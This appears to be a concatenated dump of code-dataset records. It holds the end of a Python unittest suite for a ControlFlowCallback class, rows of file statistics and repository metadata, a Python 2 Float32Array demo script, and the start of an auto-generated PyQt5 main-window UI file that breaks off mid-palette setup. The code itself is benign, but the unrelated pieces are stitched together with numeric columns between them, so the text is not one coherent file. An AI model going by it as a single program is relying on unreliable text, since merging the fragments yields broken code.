with self.assertRaises(ValueError):
ControlFlowCallback(callback, loaders=1234.56)
with self.assertRaises(ValueError):
ControlFlowCallback(callback, loaders=1234.56)
with self.assertRaises(ValueError):
ControlFlowCallback(callback, loaders={"train": ["", "fjdskjfdk", "1234"]})
def test_ignore_loaders_with_wrong_args(self):
orders = (
CallbackOrder.Internal,
CallbackOrder.Metric,
CallbackOrder.MetricAggregation,
CallbackOrder.Optimizer,
CallbackOrder.Scheduler,
CallbackOrder.External,
)
order = random.choice(orders)
callback = RaiserCallback(order, "on_epoch_start")
with self.assertRaises(ValueError):
ControlFlowCallback(callback, ignore_loaders=1234.56)
with self.assertRaises(ValueError):
ControlFlowCallback(callback, ignore_loaders=1234.56)
with self.assertRaises(ValueError):
ControlFlowCallback(callback, ignore_loaders={"train": ["", "fjdskjfdk", "1234"]})
def test_ignore_foo_with_wrong_args(self):
orders = (
CallbackOrder.Internal,
CallbackOrder.Metric,
CallbackOrder.MetricAggregation,
CallbackOrder.Optimizer,
CallbackOrder.Scheduler,
CallbackOrder.External,
)
order = random.choice(orders)
callback = RaiserCallback(order, "on_epoch_start")
with self.assertRaises(ValueError):
ControlFlowCallback(callback, filter_fn=12345)
with self.assertRaises(ValueError):
ControlFlowCallback(callback, filter_fn=lambda arg: True)
with self.assertRaises(ValueError):
ControlFlowCallback(callback, filter_fn=lambda *args: True)
with self.assertRaises(ValueError):
ControlFlowCallback(callback, filter_fn=lambda one, two, three, four: True)
with self.assertRaises(ValueError):
ControlFlowCallback(callback, filter_fn=lambda *args, **kwargs: True)
def test_filter_fn_with_wrong_args(self):
runner = Mock(stage="stage1", loader_key="train", epoch=1)
orders = (
CallbackOrder.Internal,
CallbackOrder.Metric,
CallbackOrder.MetricAggregation,
CallbackOrder.Optimizer,
CallbackOrder.Scheduler,
CallbackOrder.External,
)
def _ignore_foo(stage: str, epoch: int, loader: str) -> bool:
return False
def _raise_foo(stage: str, epoch: int, loader: str) -> bool:
return True
for order in orders:
callback = RaiserCallback(order, "on_loader_start")
wrapper = ControlFlowCallback(callback, filter_fn=_ignore_foo)
wrapper.on_loader_start(runner)
callback = RaiserCallback(order, "on_loader_start")
wrapper = ControlFlowCallback(callback, filter_fn=_raise_foo)
with self.assertRaises(Dummy):
wrapper.on_loader_start(runner)
events = (
"on_loader_end",
"on_stage_start",
"on_stage_end",
"on_epoch_start",
"on_epoch_end",
"on_batch_start",
"on_batch_end",
"on_exception",
)
for event in events:
for order in orders:
callback = RaiserCallback(order, event)
wrapper = ControlFlowCallback(callback, filter_fn=_ignore_foo)
wrapper.on_loader_start(runner)
wrapper.__getattribute__(event)(runner)
callback = RaiserCallback(order, event)
wrapper = ControlFlowCallback(callback, filter_fn=_raise_foo)
wrapper.on_loader_start(runner)
with self.assertRaises(Dummy):
wrapper.__getattribute__(event)(runner)
def test_filter_fn_with_eval(self):
runner = Mock(stage="stage1", loader_key="train", epoch=1)
orders = (
CallbackOrder.Internal,
CallbackOrder.Metric,
CallbackOrder.MetricAggregation,
CallbackOrder.Optimizer,
CallbackOrder.Scheduler,
CallbackOrder.External,
)
for order in orders:
callback = RaiserCallback(order, "on_loader_start")
wrapper = ControlFlowCallback(callback, filter_fn="lambda s, e, l: False")
wrapper.on_loader_start(runner)
callback = RaiserCallback(order, "on_loader_start")
wrapper = ControlFlowCallback(callback, filter_fn="lambda s, e, l: True")
with self.assertRaises(Dummy):
wrapper.on_loader_start(runner)
events = (
"on_loader_end",
"on_stage_start",
"on_stage_end",
"on_epoch_start",
"on_epoch_end",
"on_batch_start",
"on_batch_end",
"on_exception",
)
for event in events:
for order in orders:
callback = RaiserCallback(order, event)
wrapper = ControlFlowCallback(callback, filter_fn="lambda s, e, l: False")
wrapper.on_loader_start(runner)
wrapper.__getattribute__(event)(runner)
callback = RaiserCallback(order, event)
wrapper = ControlFlowCallback(callback, filter_fn="lambda s, e, l: True")
wrapper.on_loader_start(runner)
with self.assertRaises(Dummy):
wrapper.__getattribute__(event)(runner)
def test_filter_fn_with_err_in_eval(self):
orders = (
CallbackOrder.Internal,
CallbackOrder.Metric,
CallbackOrder.MetricAggregation,
CallbackOrder.Optimizer,
CallbackOrder.Scheduler,
CallbackOrder.External,
)
events = (
"on_loader_start",
"on_loader_end",
"on_stage_start",
"on_stage_end",
"on_epoch_start",
"on_epoch_end",
"on_batch_start",
"on_batch_end",
"on_exception",
)
for event in events:
for order in orders:
callback = RaiserCallback(order, event)
with self.assertRaises(ValueError):
ControlFlowCallback(callback, filter_fn="lambda s, e, l")
| 32.231193
| 97
| 0.597063
| 1,760
| 17,566
| 5.7375
| 0.073295
| 0.024559
| 0.041196
| 0.045157
| 0.922757
| 0.907705
| 0.879283
| 0.855318
| 0.821846
| 0.780254
| 0
| 0.012793
| 0.301378
| 17,566
| 544
| 98
| 32.290441
| 0.810055
| 0.000683
| 0
| 0.755991
| 0
| 0
| 0.06495
| 0
| 0
| 0
| 0
| 0
| 0.071895
| 1
| 0.058824
| false
| 0.002179
| 0.008715
| 0.004357
| 0.082789
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
72d560b8d1aa6b09fdbd7f42d7dc09a307b6d315
| 1,746
|
py
|
Python
|
utils/unit/arraybuffer_unit.py
|
teddydragoone/makehuman1.0.0alpha7
|
9aa7735a0a1ea83e52b1acc0fb8760057dd72d99
|
[
"CC0-1.0"
] | 2
|
2016-11-23T16:37:15.000Z
|
2018-02-13T04:18:23.000Z
|
utils/unit/arraybuffer_unit.py
|
Tomoyon/makehuman1.0.0alpha7
|
9aa7735a0a1ea83e52b1acc0fb8760057dd72d99
|
[
"CC0-1.0"
] | null | null | null |
utils/unit/arraybuffer_unit.py
|
Tomoyon/makehuman1.0.0alpha7
|
9aa7735a0a1ea83e52b1acc0fb8760057dd72d99
|
[
"CC0-1.0"
] | null | null | null |
from mh import ArrayBuffer, Float32Array;
# build from number
f32 = Float32Array(4)
print f32, f32.byteOffset, f32.byteLength, f32.length, [f for f in f32]
# build from view
f32 = Float32Array(Float32Array((1.0, 2.0, 3.0, 4.0)))
print f32, f32.byteOffset, f32.byteLength, f32.length, [f for f in f32]
# build from buffer
f32 = Float32Array(Float32Array((1.0, 2.0, 3.0, 4.0)).buffer)
print f32, f32.byteOffset, f32.byteLength, f32.length, [f for f in f32]
# build from buffer with offset
f32 = Float32Array(Float32Array((1.0, 2.0, 3.0, 4.0)).buffer, 4)
print f32, f32.byteOffset, f32.byteLength, f32.length, [f for f in f32]
# build from buffer with offset and length
f32 = Float32Array(Float32Array((1.0, 2.0, 3.0, 4.0)).buffer, 4, 8)
print f32, f32.byteOffset, f32.byteLength, f32.length, [f for f in f32]
# build from sequence
f32 = Float32Array((1.0, 2.0, 3.0, 4.0))
print f32, f32.byteOffset, f32.byteLength, f32.length, [f for f in f32]
# item
print f32[0], f32[1], f32[2], f32[3]
# assign item
f32[1] = 5.0
print f32, f32.byteOffset, f32.byteLength, f32.length, [f for f in f32]
# slice
f32 = Float32Array((1.0, 2.0, 3.0, 4.0))[:2]
print f32, f32.byteOffset, f32.byteLength, f32.length, [f for f in f32]
f32 = Float32Array((1.0, 2.0, 3.0, 4.0))[2:]
print f32, f32.byteOffset, f32.byteLength, f32.length, [f for f in f32]
# assign slice from view
f32 = Float32Array((1.0, 2.0, 3.0, 4.0))
f32[1:3] = Float32Array((5.0, 6.0))
print f32, f32.byteOffset, f32.byteLength, f32.length, [f for f in f32]
# assign slice from sequence
f32 = Float32Array((1.0, 2.0, 3.0, 4.0))
f32[1:3] = (5.0, 6.0)
print f32, f32.byteOffset, f32.byteLength, f32.length, [f for f in f32]
| 29.1
| 72
| 0.658076
| 317
| 1,746
| 3.624606
| 0.100946
| 0.083551
| 0.105309
| 0.201044
| 0.878155
| 0.878155
| 0.878155
| 0.878155
| 0.878155
| 0.878155
| 0
| 0.19131
| 0.182703
| 1,746
| 60
| 73
| 29.1
| 0.613875
| 0.123139
| 0
| 0.538462
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.038462
| null | null | 0.461538
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
f44b574fa80a7c4a7d37cc583d547cc233284769
| 94,202
|
py
|
Python
|
main_window_ui.py
|
junglefive/BleProduceTestHelper
|
aa8bcdb9f3b53b10ceb68cc4624e72703f006dff
|
[
"MIT"
] | null | null | null |
main_window_ui.py
|
junglefive/BleProduceTestHelper
|
aa8bcdb9f3b53b10ceb68cc4624e72703f006dff
|
[
"MIT"
] | null | null | null |
main_window_ui.py
|
junglefive/BleProduceTestHelper
|
aa8bcdb9f3b53b10ceb68cc4624e72703f006dff
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'main_window.ui'
#
# Created by: PyQt5 UI code generator 5.9
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.setEnabled(True)
MainWindow.resize(632, 1250)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(MainWindow.sizePolicy().hasHeightForWidth())
MainWindow.setSizePolicy(sizePolicy)
MainWindow.setMinimumSize(QtCore.QSize(485, 759))
MainWindow.setMaximumSize(QtCore.QSize(16777215, 16777215))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 236, 233))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(247, 245, 244))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 118, 116))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(160, 157, 155))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 236, 233))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(247, 245, 244))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 236, 233))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(247, 245, 244))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 118, 116))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(160, 157, 155))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 236, 233))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(247, 245, 244))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 118, 116))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 236, 233))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(247, 245, 244))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 118, 116))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(160, 157, 155))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 118, 116))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 118, 116))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 236, 233))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 236, 233))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 236, 233))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
MainWindow.setPalette(palette)
MainWindow.setTabletTracking(False)
MainWindow.setLayoutDirection(QtCore.Qt.LeftToRight)
self.centralwidget = QtWidgets.QWidget(MainWindow)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(247, 247, 247))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(160, 160, 160))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(247, 247, 247))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(247, 247, 247))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(160, 160, 160))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(247, 247, 247))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(247, 247, 247))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(160, 160, 160))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.centralwidget.setPalette(palette)
self.centralwidget.setObjectName("centralwidget")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.centralwidget)
self.horizontalLayout.setContentsMargins(-1, -1, -1, 0)
self.horizontalLayout.setSpacing(0)
self.horizontalLayout.setObjectName("horizontalLayout")
self.gridLayout = QtWidgets.QGridLayout()
self.gridLayout.setSpacing(0)
self.gridLayout.setObjectName("gridLayout")
self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)
self.tabWidget.setEnabled(True)
self.tabWidget.setBaseSize(QtCore.QSize(480, 590))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
